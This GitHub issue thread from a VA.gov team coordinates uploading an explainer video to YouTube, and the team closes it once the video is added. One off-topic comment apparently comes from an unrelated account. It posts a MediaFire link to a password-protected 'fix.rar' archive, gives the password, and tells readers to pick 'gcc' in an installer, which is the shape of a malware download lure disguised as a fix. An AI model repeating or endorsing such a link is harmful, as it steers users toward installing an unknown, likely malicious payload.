### ISSUE TITLE
Put Explainer Video on YouTube

### ISSUE THREAD

**Issue by alyssagallion** [department-of-veterans-affairs/va.gov-team#91469]
## Description 
We need to add the explainer video that Anthony created here: https://drive.google.com/file/d/1aVYjhIj27C_8CJZsRc6iZXZUK4ZqZE5d/view to YouTube for easy access. Instructions here: https://vfs.atlassian.net/wiki/spaces/PPS/pages/2656731745/Orientation+Host+Guidance

---

## Definition of Done
All tasks below are complete. 

---

## Tasks 
_Steps to reach definition of done._ 
- [x] Add launched item to the [Launched Support Enhancements Confluence Doc](https://vfs.atlassian.net/wiki/spaces/PTST/pages/2632286220/Launched+Support+Enhancements+Documentation)
- [ ] Alyssa to communicate to relevant channels (Alyssa will update which channels in the tasks after the ticket is assigned to her)
--- 

## Resources & Additional Info 
_Links, screenshots, etc. go here_ 

---

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AnthonyWFlowers** [comment]
Youtube video added [here](https://youtu.be/V3o_oiwrpA4); added launched item to the Launched Support Enhancements Confluence Doc.

**Comment by alyssagallion** [comment]
Closing!
